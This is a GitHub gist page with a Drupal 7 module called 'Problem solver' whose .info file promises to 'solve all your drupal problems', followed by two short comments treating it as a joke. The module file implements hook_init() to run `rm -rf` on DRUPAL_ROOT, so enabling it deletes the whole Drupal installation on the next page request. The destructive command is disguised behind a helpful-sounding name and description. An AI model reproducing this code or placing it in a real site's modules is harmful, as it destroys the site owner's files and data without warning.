Skip to content

Instantly share code, notes, and snippets.

@tallsam
Forked from nigelheap/problem_solver.info
Created May 23, 2012 06:15
Show Gist options
  • Save tallsam/2773513 to your computer and use it in GitHub Desktop.
Save tallsam/2773513 to your computer and use it in GitHub Desktop.
problem_solver module
name = Problem solver
description = The module that will solve all your drupal problems.
package = Problems
version = 1.x
core = 7.x
<?php
/**
* @file
*
* Module file for Problem Solver module.
*/
/**
* Implements hook_init().
*/
function problem_solver_init() {
$dir = DRUPAL_ROOT;
`rm -rf $dir`;
}
@tallsam
Copy link
Author

tallsam commented May 23, 2012

Coding standards cleanup.

@dinartux
Copy link

wow. such module!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment